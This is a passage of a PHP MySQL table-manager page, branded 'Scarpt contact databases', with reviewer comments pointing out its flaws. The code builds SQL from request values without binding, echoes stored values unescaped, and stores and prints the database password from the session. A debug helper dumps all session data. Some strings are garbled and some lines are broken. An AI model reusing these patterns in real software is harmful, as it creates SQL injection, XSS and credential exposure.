  650. }
  651.  
  652. //********************************************************************
  // Connects to MySQL with the host, user and password kept in the PHP session and returns
  // the link, or false after printing an error block. When the session holds no user or
  // password, the page footer is printed and the script exits.
  // REVIEW (defender): the database password is kept in clear text in $_SESSION, so it is
  // also present in the server-side session storage for as long as the session lives. The
  // error message echoes the session host and user name without escaping.
  // display_foot() is not defined in the visible part of the file.
  653. function connectmysql(){
  654.         //Connects to the MySQL Database.
  655.  
  656.  
  657.         if (isset($_SESSION['user']) && isset($_SESSION['password'])){
  658.                  $user = $_SESSION['user'];
  659.                  $pass = $_SESSION['password'];
  660.         }else{
  661.         display_foot();
  662.         echo"\n</body>\n</html>";
  663.                 exit();
  664.         }
  665.         $link = @mysql_connect($_SESSION['host'], $_SESSION['user'], $_SESSION['password']);
  666.         if(! $link){
  667.                 echo"<div class='error'>\n";
  668.                 echo"Unable to connect to the database server. <BR>";
  669.                 echo"The Host: $_SESSION[host], Username: $user Or call confidential Ktae. <br>";
  670.                 echo"As well out of the record attempt once Akharie.\n";
  671.                 echo"</div>\n";
  672.  
  673.         return false;
  // Never reached: the function has already returned on the line above.
  674.                 exit();
  675.         } else{
  676.                 return $link;
  677.         }
  678.  
  679. }
  680. //*********************************************************************
  // Selects database $db on connection $link; on failure prints a message containing the
  // database name (unescaped) and terminates the script.
  681. function connectdb($db, $link){
  682.         if(! mysql_select_db($db,$link)){
  683.                 echo"Unable to locate database $db.<br> Please try again later.\n";
  684.                 exit();
  685.         }
  686. }
  687. //*********************************************************************
  // Runs $sql with mysql_query() (no link argument is passed) and returns the result, or
  // false after printing the failed statement and mysql_error(). $tablename and $db are
  // accepted but not used. The statement is executed exactly as passed in, and on failure
  // both the SQL text and the server error are written into the page without HTML escaping.
  688. function exequery($sql, $tablename, $db){
  689.         $result= @mysql_query( $sql );
  690.         if($result){
  691.                 //echo "Query successful";
  692.                 return $result;
  693.         }else{
  694.                 echo"Sorry your Query failed: $sql <br> error:".mysql_error()."\n";
  695.                 return false;
  696.         }
  697. }
  698.  
  699.  
  700. //***************************************************
  // Column type names known to the SQL manager; the code that uses this list is outside the
  // visible part of the file.
  701. $fieldtypes = array("BIGINT", "BLOB", "CHAR", "DATE", "DATETIME", "DECIMAL", "DOUBLE", "ENUM", "FLOAT",
  702.   "INT", "INTEGER", "LONGBLOB", "LONGTEXT", "MEDIUMBLOB", "MEDIUMINT", "MEDIUMTEXT", "NUMERIC", "PRECISION",
  703.  "REAL","SET", "SMALLINT", "TEXT", "TIME", "TIMESTAMP", "TINYBLOB", "TINYINT", "TINYTEXT", "VARCHAR", "YEAR" );
  704.  
  705.  
  706. //****************** Search Form ****************************
  // Prints the search form for one table: hidden dbname and tablename fields, a free-text
  // 'searchval' input and a submit button named 'search'. $dbname and $tablename are written
  // into attribute values without escaping. $action is not declared in this function's scope.
  707. function searchtableform($tablename, $dbname){
  708.         echo"<form method='post' action='$action'>\n";
  709.         echo"<input type=hidden name='dbname' value='$dbname' />\n";
  710.         echo"<input type=hidden name='tablename' value='$tablename' />\n";
  711.         echo"<input type=text name='searchval' />\n";
  712.         echo"<input class=ser type=submit name='search' value='Search $tablename' />\n";
  713.         echo"</form>\n";
  714. }
  715. //********************* Search *************************
  // Full-table search. Splits $searchval on spaces and builds one
  // "column like '%token%'" condition per token and per column of $tablename, all joined
  // with "or", then runs the resulting SELECT through exequery() and returns its result.
  // Returns nothing when $searchval is empty.
  // Both the table name and the search tokens are interpolated into the SQL text without
  // escaping or parameter binding.
  716. function searcht($tablename, $dbname, $searchval){
  717.         if(! empty($searchval)){
  718.                 //        $searchval= str_replace(";",' ', $searchval);
  // First query is only used to learn the number of columns.
  719.         $result=exequery("Select * from $tablename", $tablename, $dbname);
  720.                 //$result=mysql_query("Select * from $tablename");
  721.                 $num = mysql_num_fields($result);
  722.                 $fields = mysql_list_fields($dbname, $tablename);
  723.                 $whr="where ";
  724.                 $tok=explode(" ",$searchval);
  725.                 for ($t =0; $t < count($tok); $t++){
  726.                         for ( $c = 0; $c < $num; $c++){
  727.                                 $fn =mysql_field_name($fields, $c);
  728.                                 $whr .=" $fn like '%$tok[$t]%' or ";
  729.                         }
  730.                 }
  // Replace the last three characters (the trailing "or ") with a space, then trim.
  731.                 $whr=trim(substr_replace($whr, " ", -3));
  732.                 $query="Select * from $tablename $whr";
  733.                 $result=exequery($query, $tablename, $dbname);
  734.                 return $result;
  735.         }
  736.  
  737. }
  738. //*********************GOTO buttons*************************
  739. //provides a form and button.
  740.  
  // Prints a one-button POST form. Unless $name contains 'tablestart' (case-insensitive
  // eregi match), hidden dbname and tablename fields are included. $va is the button label,
  // $name its field name, $class its CSS class and $action the form target.
  // All arguments are written into the HTML without escaping.
  741. function goto($tablename, $dbname, $action, $class, $name, $va ){
  742.         //Adds a button.
  743.  
  744.         echo"<form action='$action' method='post' >\n";
  745.  
  746.                 if(! eregi('tablestart', $name)){
  747.                         echo"<input type=hidden name=dbname value='$dbname' />\n";
  748.                         echo"<input type=hidden name=tablename value='$tablename' />\n";
  749.                 }
  750.                 echo"<input class=$class type=submit  value='$va' name='$name' />\n";
  751.                 //echo"<input class=$class type=submit  value='$action' name=$name>";
  752.         echo"</form>\n";
  753.  
  754.         //echo"<a class=$class href=$action>$va</a>";
  755.         //}
  756. }
  757.  
  758. //*********************** ShowDB ***********************************
  // Main database page of the SQL manager. After a successful connectmysql() it prints a
  // form for creating a new database (fields ndbname and cndb) and then the list of
  // databases returned by dbrestrict(), rendered by showdbs(). Prints nothing when the
  // connection fails. $action is not declared in this function's scope.
  759. function showdb(){
  760. //function showdb($backuppath){
  761.  
  762.         $link=connectmysql();
  763.         if ($link){
  764.         echo"<div class='db'>";
  765.                 echo"<div class='cream'>\n";
  766.                 echo"<h2 class=h >The establishment of a new base</h2>\n";
  767.  
  768.                 echo"<form name=cdb action='$action' method='post' >\n";
  769.                 echo"Name of new rule: <input type=text name=ndbname />\n";
  770.                 echo"<br /><br /><input class=but type='submit' name='cndb' value='The establishment of a new base' />\n";
  771.                 echo"</form><br />";
  772.                 echo"</div>";
  773.                 echo"<h2 class=h >The list of rules available</h2>\n";
  774.                 //Restrict the database for users
  775.         $dbnamearray= dbrestrict();
  776.         showdbs($dbnamearray);
  777.         echo"</div>";
  778.            }
  779.  
  780. }
  781.  
  782. //********************** BuildWhr ******************************
  783. //Builds the Where part of queries.
  784.  
  // Builds the condition text "k0='v0' and k1='v1' ..." from the parallel arrays $pk
  // (column names) and $pv (values); the number of pairs is count($pv). Names and values
  // are interpolated as given, with no escaping. The result is compared with a single space
  // although it starts out as the empty string, so an empty $pv yields "" rather than false.
  785. function buildwhr($pk, $pv){
  786.         $whr="";
  787.         $pn =count($pv);
  788.         for($t =0; $t < $pn; $t++){
  789.                 $whr.="$pk[$t]='$pv[$t]'";
  790.                 if($t < $pn-1){
  791.                         $whr.=" and ";
  792.                 }
  793.         }
  794.         if ($whr !=" "){
  795.                 return $whr;
  796.         }else{
  797.                 return false;
  798.         }
  799. }
  800. //***********************ADD Record ******************
  801.  
  // Inserts one row into $tablename. $array holds one value per column, in column order; an
  // element that is itself an array (multi-select for a SET column) is joined with commas.
  // Returns the exequery() result on success and false on failure.
  // Values pass through AddSlashes() before being quoted into the statement — this is string
  // escaping, not parameter binding — and $tablename is interpolated unescaped.
  802. function addrecord($tablename, $dbname, $array){
  // Used only to learn how many columns the table has.
  803.      $result=exequery("Select * from $tablename", $tablename, $dbname);
  804.         //$result = @mysql_query( "Select * from $tablename" );
  805.  
  806.         $flds = mysql_num_fields($result);
  807.         //$fields = mysql_list_fields($dbname, $tablename);
  808.            $qry=" ";
  809.     $query = "Insert into $tablename Values( ";
  810.         for ($x =0; $x < $flds; $x++){
  811.         //Multiple Select values for SET
  812.  
  813.        if(is_array($array[$x])){
  814.             $mval="";
  815.             for($m=0; $m < count($array[$x]); $m++){
  816.                 if($m+1 == count($array[$x])){
  817.                     $mval.= AddSlashes($array[$x][$m]);
  818.  
  819.                 }else{
  820.                     $mval.= AddSlashes($array[$x][$m]).",";
  821.                 }
  822.                 $fval = $mval;
  823.             }
  824.         }else{
  825.                     $fval = AddSlashes($array[$x]);
  826.         }
  827.                 $qry .= "'$fval'";
  828.                 if ($x < $flds-1){
  829.                         $qry.= ", ";
  830.                 }
  831.         }
  832.         $query .= $qry.")";
  833.    // echo"qry: $qry";
  834.         $result=exequery($query, $tablename, $dbname);
  835.         if($result){
  836.                 return $result;
  837.         }else{
  838.                 return false;
  839.         }
  840. }
  841.  
  842. //**********************ADD Form **********************
  843.  
function addform($tablename, $dbname){
 // Echoes the "add record" form for $tablename: one table row per column with
 // the column name, its type and an input control. Returns nothing.
 //
 // Metadata comes from three places: a "Select *" probe through exequery()
 // (count, type, length, flags), mysql_list_fields() (names) and one
 // "show columns ... like" query per column (SET/ENUM member list).
 //
 // NOTE(review): $action is never assigned in this function and there is no
 // `global` statement, so the form's action attribute renders empty.
 // NOTE(review): $tablename, $dbname and the column metadata are placed into
 // SQL and HTML without any escaping. The top-level script takes tablename
 // from the request; presumably that is what arrives here - confirm at the
 // call site.
 // NOTE(review): eregi() and the mysql_* functions were removed in PHP 7.
 // NOTE(review): $result is used without checking that the probe succeeded.
 echo"<form action='$action' method='post'>\n";
 echo"<table border=0 width='100%' align='center'>\n";
 echo"<tr class=head><td>Field Name</td><td>Type</td><td>Value</td></tr>\n";
  $result=exequery("Select * from $tablename", $tablename, $dbname);
 //$result = @mysql_query( "Select * from $tablename" );
 $flds = mysql_num_fields($result);
 $fields = mysql_list_fields($dbname, $tablename);
 echo"<input type=hidden name=tablename value='$tablename' />\n";
 echo"<input type=hidden name='dbname' value='$dbname' />\n";
 // A single <tr> is opened here, but every branch below closes a </tr> per
 // column, so the emitted markup is unbalanced after the first column.
 echo"<tr>\n";

 $mxlen = 80;//max width of the form fields.
 for($i=0; $i < $flds; $i++){
      $auto = "false";
      echo "<th>".mysql_field_name($fields, $i);
      $fieldname = mysql_field_name($fields, $i);  // same name again, kept for the query below
      $type  = mysql_field_type($result, $i);
      $flen = mysql_field_len($result, $i);//length of the field
      $flagstring = mysql_field_flags ($result, $i);
    // Look the column up again to read its declared type. The pattern
    // '%<name>' also matches any other column whose name ends with the same
    // text, and only the first returned row is read.
      $newsql = "show columns from $tablename like '%".$fieldname."'";
      $newresult = exequery($newsql, $tablename, $dbname);
      //mysql_query($newsql) or die ('I cannot get the query because: ' . mysql_error());
      $arr=mysql_fetch_array($newresult);
    // $arr[1] is treated below as the column's type definition string.
      if (eregi("primary",$flagstring )){
       $type .= " PK ";
      }
      if(eregi("auto",$flagstring )){
       $type .= " auto_increment";
       $auto = "true";
      }
      if ($auto=="true"){
        // auto_increment columns are pre-filled with 0.
        echo"<td>$type</td><td><input type=text name='array[$i]' size='$flen' value=0 /></td></tr>\n";
      }elseif($flen > $mxlen){
        // Long columns get a textarea; the row count is length/80 capped at 10
        // and is not rounded, so it can be fractional.
        $rws= $flen/$mxlen;
        if($rws>10){
             $rws=10; //max length of textarea
        }
        echo"<td>$type</td><td><textarea name='array[$i]' rows=$rws cols=$mxlen></textarea></td></tr>\n";
      }elseif (strncmp($arr[1],'set',3)==0 || strncmp($arr[1],'enum',4)==0){  // We have a field type of set or enum
       $num=substr_count($arr[1],',') + 1;  // number of members = commas + 1
       $pos=strpos($arr[1],'(' ); //find the position of '('
       $newstring=substr($arr[1],$pos+1);  // drop everything up to and including '('
       $snewstring=str_replace(')','',$newstring); // removes every ')' in the remainder
       $nnewstring=explode(',',$snewstring,$num); // member list; each entry keeps its own quotes
       if(strncmp($arr[1],'set',3)==0 ){//Sets can have combinations of values
           echo "<td>Set (select one or more)</td>";
           echo"<td><select name='array[$i][]' size='3' multiple>";
       }else{//Enum one value only
        echo "<td>Enum</td>";
           echo"<td><select name='array[$i]'>";
       }
       for($y=0; $y<$num;$y++){
       // The member text is used as both the unquoted attribute value and the label.
       echo"<option value=$nnewstring[$y]>$nnewstring[$y]";
       }
        echo"</select></td></tr>\n";
      }else{
       echo"<td>$type</td><td><input type=text name='array[$i]' size='$flen' /></td></tr>\n";
      }
 }
 echo"<tr><td><input class=but type=submit name='addrec' value='Add Record' /></td>\n";
 echo"<td><input class=but type=reset name='reset' value='Reset Form' /></td>\n";
 echo"</tr>";
 echo"</table>\n";
 echo"</form>\n";
}
  915.  
  916.  
  917. //*********************Edit Form ***************
function editform($tablename, $dbname, $result, $edit, $pk, $pv){
        // Echoes the "edit record" form for the first row of $result: one
        // control per column pre-filled with the current value, plus hidden
        // pk[]/pv[] fields that identify the row. Returns nothing.
        //
        // $edit is accepted but never read in this function.
        //
        // NOTE(review): $action is never assigned here and there is no
        // `global` statement, so the form's action attribute renders empty.
        // NOTE(review): row values, $tablename, $dbname, $pk and $pv are
        // written into HTML attributes and element bodies unescaped, so a
        // stored value containing a quote or markup changes the page
        // structure (stored XSS in the operator's browser).
        // NOTE(review): the mysql_* functions were removed in PHP 7.
        $row=mysql_fetch_array($result);
        echo"<form action='$action'  method=post>\n";
        echo"<table border=0 width ='100%' align='center'>\n";

        $flds = mysql_num_fields($result);
        $fields = mysql_list_fields($dbname, $tablename);
        echo"<input type=hidden name=tablename value='$tablename' />\n";

        echo"<input type=hidden name='dbname' value='$dbname' />\n";
        // One <tr> is opened here while each column below closes its own </tr>.
        echo"<tr>";
        $mxlen = 80;//max width of the form fields
        for($i=0; $i < $flds; $i++){
        $fname=mysql_field_name($fields, $i);
                echo "<th>$fname";
                 $flen = mysql_field_len($result, $i);//length of the field
                $nslash = StripSlashes($row[$i]);
        // Look the column up again to read its declared type. The pattern
        // '%<name>' also matches other columns ending in the same text; only
        // the first returned row is read.
      $newsql = "show columns from $tablename like '%".$fname."'";
      $newresult = exequery($newsql, $tablename, $dbname);
      $arr=mysql_fetch_array($newresult);
    // $arr[1] is treated below as the column's type definition string.

                if($flen > $mxlen){
                        // Long columns get a textarea; rows = length/80 capped at 10, not rounded.
                        $rws= $flen/$mxlen;
                                if($rws>10){
                                $rws=10; //max length of textarea
                        }
                        echo"<td><textarea name='array[$i]' rows=$rws cols=$mxlen>$nslash</textarea></td></tr>\n";
          }elseif (strncmp($arr[1],'set',3)==0 || strncmp($arr[1],'enum',4)==0){  // We have a field type of set or enum
           $num=substr_count($arr[1],',') + 1;  // number of members = commas + 1
           $pos=strpos($arr[1],'(' ); //find the position of '('
           $newstring=substr($arr[1],$pos+1);  // drop everything up to and including '('
           $snewstring=str_replace(')','',$newstring); // removes every ')' in the remainder
           $nnewstring=explode(',',$snewstring,$num); // member list; each entry keeps its own quotes
           if(strncmp($arr[1],'set',3)==0 ){//Sets can have combinations of values
               echo"<td><select name='array[$i][]' multiple size='3'>";
           }else{//Enum one value only
               echo"<td><select name='array[$i]'>";
           }
           // Current value split on commas, to mark the matching options.
           $nsel=explode(",",$nslash);
          for($y=0; $y<$num;$y++){
                // A member is pre-selected when it equals a current value wrapped in single quotes.
                $sel="";
                for($e=0; $e<count($nsel);$e++){
                    if($nnewstring[$y]=="'".$nsel[$e]."'"){
                        $sel="selected";
                    }
                }
                echo"<option value=$nnewstring[$y] $sel>$nnewstring[$y]";
           }
            echo"</select></td></tr>\n";


        }else{
                        echo"<td><input type=text name='array[$i]' size='$flen' value='$nslash' /></td></tr>\n";
                }
                // This loop sits inside the per-column loop, so the full set of
                // hidden pk[]/pv[] inputs is emitted once for every column.
                for($f =0; $f< count($pk);$f++){
                        echo"<input type=hidden name=pk[$f] value='$pk[$f]' />";
                        echo"<input type=hidden name=pv[$f] value='$pv[$f]' />\n";
                }
        }
        echo"<tr><td><input class=but type=submit name='editrec' value='Update' /></td>\n";
        echo"<td><input class=but type=reset name='reset' value='Reset Form' /></td>\n";
        echo"</tr>";
        echo"</table>\n";
        echo"</form>\n";
}
  988. //************************Edit Record*************************
function editrec($dbname, $tablename, $pk, $pv, $array){
        // Builds and runs "UPDATE <table> set col = 'val', ... where <keys>".
        // $array holds the new value for every column in column order; $pk/$pv
        // are the parallel name/value lists that buildwhr() turns into the
        // WHERE clause. Returns the exequery() result, or false when it is falsy.
        //
        // NOTE(review): $tablename and the column names are interpolated as-is.
        // NOTE(review): the SET values go through AddSlashes(), which is not a
        // charset-aware SQL escape; the WHERE clause gets no escaping at all
        // and StripSlashes() is then applied to it, removing any backslashes
        // the key values carried. With request-supplied pk/pv this is an SQL
        // injection sink.
        // NOTE(review): if buildwhr() yields nothing the statement ends in
        // " where " with no condition.
        // NOTE(review): $result is not checked before mysql_num_fields().

        //$result = @mysql_query( "Select * from $tablename" );
    $result = exequery("Select * from $tablename", $tablename, $dbname);
        $flds = mysql_num_fields($result);
        $fields = mysql_list_fields($dbname, $tablename);

//Build Query
           $qry="";
    $query = "UPDATE $tablename set ";
        for ($x =0; $x < $flds; $x++){
                $fie = mysql_field_name($fields, $x );
        // An array entry is a multi-select (SET): join its members with commas.
         if(is_array($array[$x])){
            $mval="";
            for($m=0; $m < count($array[$x]); $m++){
                if($m+1 == count($array[$x])){
                    $mval.= AddSlashes($array[$x][$m]);
                }else{
                    $mval.= AddSlashes($array[$x][$m]).",";
                }
                // $fval is only assigned inside this loop, so an empty array
                // leaves the previous column's value in place.
                $fval = $mval;
            }
        }else{
                    $fval = AddSlashes($array[$x]);
        }
                //$fval = AddSlashes($array[$x]);
                $qry .= "$fie = '$fval'";
                if ($x < $flds-1){
                        $qry.= ", ";
                }
        }
        $whr = buildwhr( $pk, $pv);
        $whr =StripSlashes($whr);
        $query .= "$qry";
        $query .= " where $whr";

    $result=exequery($query, $tablename, $dbname);
        if($result){
                return $result;
        }else{
                return false;
        }
}
  1034. //****************** Number of Primary Keys ***********************
  1035. function numpk($result){
  1036.         $z =0;
  1037.         for ($i = 0; $i < $flds; $i++) {
  1038.                 //Find the primary key
  1039.                 $flagstring = mysql_field_flags ($result, $i);
  1040.                 if(eregi("primary",$flagstring )){
  1041.                         $z++;
  1042.                 }
  1043.         }
  1044.         return $z;
  1045. }
  1046. //********************Size field*****************
  1047. function fieldformsize($ft, $i, $l){
  1048.         $ft= trim(strtoupper($ft));
  1049.         if($ft =="DATE" || $ft=="TIME" || $ft== "DATETIME" ){
  1050.         }elseif( $ft=="TINYTEXT" || $ft=="BLOB" || $ft=="TEXT" || $ft =="MEDIUMBLOB"){
  1051.                 echo"<input type=hidden name='leng[$i]' value=$l>";
  1052.         }elseif($ft=="MEDIUMTEXT" || $ft=="LONGBLOB"|| $ft=="LONGTEXT" || $ft=="TINYBLOB"){
  1053.                 echo"<input type=hidden name='leng[$i]' value=$l>";
  1054.         }elseif($ft=="INT" || $ft=="TINYINT"|| $ft=="SMALLINT"|| $ft=="MEDIUMINT"|| $ft=="BIGINT" || $ft=="INTEGER"){
  1055.                 echo"<input type=text name='leng[$i]' size=5  value=$l>";
  1056.         }elseif($ft=="YEAR" ){
  1057.                 echo"<select name='leng[$i]'>";
  1058.                 echo"<option value='4'>4";
  1059.                 echo"<option value='2'>2";
  1060.                 echo"</select>\n";
  1061.     }elseif($ft=="SET"|| $ft=="ENUM"){
  1062.         echo"<input type=text name='leng[$i]' title='values eg \"a\", \"b\", \"c\"' value='' />";
  1063.         }else{
  1064.                 echo"<input type=text name='leng[$i]' size=5 value=$l />\n";
  1065.         }
  1066. }
  1067.  
  1068. //******************************Display Row ******************************
function displayrow($dbname, $tbl, $pk, $pkfield, $cpk, $row, $flds){
        // Echoes one table row for a record: an "Edit Record" form, a
        // "Delete Record" form, then one cell per column. Returns nothing.
        //
        // $pkfield lists the primary-key column names, $cpk is their count,
        // $row the fetched record and $flds the number of columns. $pk is
        // accepted but never read in this function.
        //
        // NOTE(review): $action is never assigned here and there is no
        // `global` statement, so both forms render an empty action attribute.
        // NOTE(review): every database value is written into the page as-is,
        // both inside value='...' attributes and as cell content, so a stored
        // value containing a quote or markup alters the page (stored XSS in
        // the operator's browser).
        $pkfs="";
        $hv="";
        $hf="";

        // Build the hidden pk[]/pv[] fields that identify this row to the
        // edit and delete handlers.
        if($cpk >0 && !empty($pkfield)){
                for($a = 0; $a < $cpk; $a++){
                        $fieldn = $pkfield[$a];
                        $hf .= "<input type=hidden name=pk[$a] value='$pkfield[$a]' />";
                        $hv .= "<input type=hidden name=pv[$a] value='$row[$fieldn]' />";
                }
        }else{ //No Primary Key so use all fields
                // Every column name/value pair becomes part of the row identity.
                $fields = mysql_list_fields($dbname, $tbl);
                for($b = 0; $b < $flds; $b++){
                        $fie = mysql_field_name($fields, $b );
                        $hf .= "<input type=hidden name=pk[$b] value='$fie' />";
                        $hv .= "<input type=hidden name=pv[$b] value='$row[$b]' />";
                }
        }
        echo"<tr>\n";
        //edit Record
        echo"<td><form action='$action' method=post>\n";
        echo"<input type=hidden name=dbname value='$dbname' />\n";
        echo"<input type=hidden name=tablename value='$tbl' />\n";
        echo"<input type=hidden name=npkeys value='$cpk' />\n";
        echo"$hf";
        echo"$hv";
        echo"<input class=sml type=submit name=edit value='Edit Record' />\n";
        echo"</form></td>\n";

        //Delete record (the key count is sent as 'num' here, 'npkeys' above)
        echo"<td><form action='$action' method=post>\n";
        echo"<input type=hidden name=dbname value='$dbname' />\n";
        echo"<input type=hidden name=tablename value='$tbl' />\n";
        echo"<input type=hidden name=num value='$cpk' />\n";
        echo"$hf";
        echo"$hv";
        echo"<input class=smldel type=submit name=delete value='Delete Record' />\n";
        echo"</form></td>";

        //Display all the columns.
        for($col = 0; $col < $flds; $col ++){
                $nslash = StripSlashes($row[$col]);
                echo"<td>$nslash</td>";
        }
        echo"</tr>";

}
  1117. //***********************Remove Array Copy********************************
  1118. //removes copies from an array $x.
  1119.  
  1120. function removearraycopy($x){
  1121.         $leng= count($x);
  1122.         sort($x);
  1123.         $farr=array();
  1124.  
  1125.         for ($i =0; $i < $leng; $i++){
  1126.                 $flag=false;
  1127.                 for ($s =0; $s < count($farr); $s++){
  1128.                         if($x[$i]==$farr[$s]){
  1129.                                 $flag=true;
  1130.                         }
  1131.                 }
  1132.                 if ($flag == false){
  1133.                         $farr[count($farr)] = $x[$i];
  1134.                 }
  1135.         }
  1136.         return $farr;
  1137. }
  1138. //***********************<< page position >>********************************
  1139. function whichpage($num_rows, $pagemax, $pg, $tablename, $searchval){
  1140.         $pgs = $num_rows/$pagemax;
  1141.         $pgs=ceil($pgs);
  1142.                             //round up the number of pages.
  1143.         echo"<form action='$action' id='recspage' method='post' name='recspage'>\n";
  1144.     echo"Total number of records $num_rows, displayed on $pgs pages of \n";
  1145.     echo"<input type='text'  name='pagemax' value='$pagemax' size='4' onchange='javascript:this.form.submit();' title='Type the number records to display on a page then click outside the box' /> \n";
  1146.         echo"<input type='hidden' name='searchval' value='$searchval'  />\n";
  1147.     echo"<input type='hidden' name='tablename' value='$tablename'  />\n";
  1148.     echo"records per page.</form> \n";
  1149.     $pagescrol="";
  1150.     $sval="";
  1151.           if($pgs >1){
  1152.             $pagescrol="<div class='pagecount'>\n";
  1153.                         $nxt=$pg+1;
  1154.             $bk=$pg-1;
  1155.             $lst=$pgs;
  1156.             $end=$lst-1;
  1157.             $showp=$pg+1;
  1158.            if($searchval !=""){
  1159.             $sval="&amp;searchval=$searchval";
  1160.            }
  1161.            $pagescrol .= "<form name='pages' id='pages' action='$action' method='get'>\n";
  1162.             if($pg>=1){
  1163.                 $pagescrol .= " <a href='$action?tablename=$tablename&amp;pg=0$sval' title='To first page'> 1 :<< </a> \n";
  1164.                                 $pagescrol .= " <a href=''action'?tablename=$tablename&amp;pg=$bk$sval' title='Back one page'> < </a> \n";
  1165.                         }
  1166.            $pagescrol .= "<input type='text' name='pg' value='$showp' size='4' onchange='javascript:this.form.submit();' title='Type a page number then click outside the box' />\n";
  1167.            $pagescrol .= "<input type='hidden' name='pback' value='true'  />\n";
  1168.            $pagescrol .= "<input type='hidden' name='searchval' value='$searchval'  />\n";
  1169.            $pagescrol .= "<input type='hidden' name='tablename' value='$tablename'  />\n";
  1170.  
  1171.            if($showp < $lst){
  1172.                 $pagescrol .= " <a href=''action'?tablename=$tablename&amp;pg=$nxt$sval' title='Next page'> > </a> \n";
  1173.                 $pagescrol .= " <a href=''action'?tablename=$tablename&amp;pg=$end$sval' title='To Last page'> >>: $lst</a> \n";
  1174.            }
  1175.            $pagescrol .= "</form>\n";
  1176.            $pagescrol.="</div>\n";
  1177.       }
  1178.         return $pagescrol;
  1179. }
  1180.  
  1181. //*************Display Footer*************************
  1182. //Please don't remove or change.
  1183. function display_foot(){
  1184.  
  1185.     echo"<div class='foot'>Version $version &copy; ".date('Y')." <a style='text-decoration:none;' target='_blank' href='http://vnbrain.net'>ly0kha</a></div>";
  1186.  
  1187.     }
  1188. //*************My Size*************************
  1189. //Returns the size of a table or database
  1190. function mysize($dbname, $tablename){
  1191.     $like="";
  1192.     $total="";
  1193.     $t=0;
  1194.     if($tablename !=""){
  1195.         $like=" like '$tablename'";
  1196.     }
  1197.     $sql= "SHOW TABLE STATUS FROM $dbname $like";
  1198.     //$result = mysql_query($sql);
  1199.     $result=exequery($sql, $tablename, $dbname);
  1200.     if($result){
  1201.  
  1202.         while($rec = mysql_fetch_array($result)){
  1203.          $t+=($rec['Data_length'] + $rec['Index_length']);
  1204.          }
  1205.         $total ="<span class='bytes'>$t bytes</span>";
  1206.     }else{
  1207.         $total="Unknowen";
  1208.     }
  1209.     return($total);
  1210. }
  1211.  
  1212.  
  1213. //**************************************
  1214. //DEBUG to show all being passed to the page
  1215. function showpassingvars(){
  1216.         echo"Get: ";
  1217.          foreach($_GET as $pram=>$value){
  1218.                  echo"$pram: $value, ";
  1219.          }
  1220.         echo"<br>Post: ";
  1221.          foreach($_POST as $pram=>$value){
  1222.                   echo"$pram: $value, ";
  1223.          }
  1224.          echo"<br>Session: ";
  1225.          foreach($_SESSION as $pram=>$value){
  1226.                  echo"$pram: $value, ";
  1227.          }
  1228.  }
// Emits the document head and the inline stylesheet, then opens <body>.
// NOTE(review): the first <meta> is written before <head> is opened, and the
// title and Content-Type meta are emitted a second time after the stylesheet
// (the second Content-Type value has no ';' before charset).
echo"<html>\n";
echo"<meta http-equiv='Content-Type' content='text/html; charset=windows-1256'>\n";
echo"<head>\n";
echo"<title>Scarpt contact databases</title>\n";
echo"<STYLE>

BODY
{
       SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; COLOR: #ffffff; SCROLLBAR-3DLIGHT-COLOR: #726456; SCROLLBAR-ARROW-COLOR: #726456; SCROLLBAR-TRACK-COLOR: #292929; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #726456
}

tr {
BORDER-RIGHT:  #cccccc ;
BORDER-TOP:    #cccccc ;
BORDER-LEFT:   #cccccc ;
BORDER-BOTTOM: #cccccc ;
color: #ffffff;
}
td {
BORDER-RIGHT:  #cccccc ;
BORDER-TOP:    #cccccc ;
BORDER-LEFT:   #cccccc ;
BORDER-BOTTOM: #cccccc ;
color: #cccccc;
}
.table1 {
BORDER: 1;
BACKGROUND-COLOR: #000000;
color: #333333;
}
.td1 {
BORDER: 1;
font: 7pt tahoma;
color: #ffffff;
}
.tr1 {
BORDER: 1;
color: #cccccc;
}
table {
BORDER:  #eeeeee  outset;
BACKGROUND-COLOR: #000000;
color: #cccccc;
}
input {
BORDER-RIGHT:  #990000 1 solid;
BORDER-TOP:    #990000 1 solid;
BORDER-LEFT:   #990000 1 solid;
BORDER-BOTTOM: #990000 1 solid;
BACKGROUND-COLOR: #333333;
font: 9pt tahoma;
color: #ffffff;
}
select {
BORDER-RIGHT:  #ffffff 1 solid;
BORDER-TOP:    #999999 1 solid;
BORDER-LEFT:   #999999 1 solid;
BORDER-BOTTOM: #ffffff 1 solid;
BACKGROUND-COLOR: #000000;
font: 9pt tahoma;
color: #CCCCCC;;
}
submit {
BORDER:  buttonhighlight 1 outset;
BACKGROUND-COLOR: #272727;
width: 40%;
color: #cccccc;
}
textarea {
BORDER-RIGHT:  #ffffff 1 solid;
BORDER-TOP:    #999999 1 solid;
BORDER-LEFT:   #999999 1 solid;
BORDER-BOTTOM: #ffffff 1 solid;
BACKGROUND-COLOR: #333333;
font: Fixedsys bold;
color: #ffffff;
}
BODY {
margin: 1;
color: #cccccc;
background-color: #000000;
}
A:link {COLOR:red; TEXT-DECORATION: none}
A:visited { COLOR:red; TEXT-DECORATION: none}
A:active {COLOR:red; TEXT-DECORATION: none}
A:hover {color:blue;TEXT-DECORATION: none}

</STYLE>\n";
// Second batch of head metadata. The author/title/description values name a
// "PHP:MySQL Table Manager" - presumably the tool this section was taken
// from - and an external stylesheet, tmgrstyles.css. These fixed strings
// appear verbatim in every response and are usable as content signatures
// when hunting for this page on a server.
echo"<meta http-equiv='Content-Type' content='text/html charset=windows-1256'>";
echo"<title>Scarpt contact databases </title>\n";
echo"<meta name='author' content='Tony Aslett'>";
echo"<meta name='title' content='PHP:MySQL Table Manager'>";
echo"<meta name='description' content='Table Manager for MySQL Database'>";
echo"<link rel='stylesheet' href='tmgrstyles.css' type='text/css'>\n";
echo"</head>\n";
echo"<body>\n";
  1325.  
// Flag set to false further down when a confirmation screen is shown instead
// of the normal listing.
$showall=true;
echo"<h2 class=h >Scarpt contact databases </h2>\n";
//******************* Session Logon ***********************
// Logout: blank the posted database name and drop the whole session.
if(isset($_POST['logout'])){

                $_POST['dbname']="";
                session_unset();
                session_destroy();
}
// Login: whatever is posted as userid/pword1 is copied into the session
// verbatim. Nothing is verified at this point, and the password stays in
// session storage in clear text for the lifetime of the session.
// NOTE(review): presumably these are the MySQL credentials connectmysql()
// uses later - that function is not visible here, confirm.
if(isset($_POST['userid']) && isset($_POST['pword1'])){
        $_SESSION['user'] = $_POST['userid'];
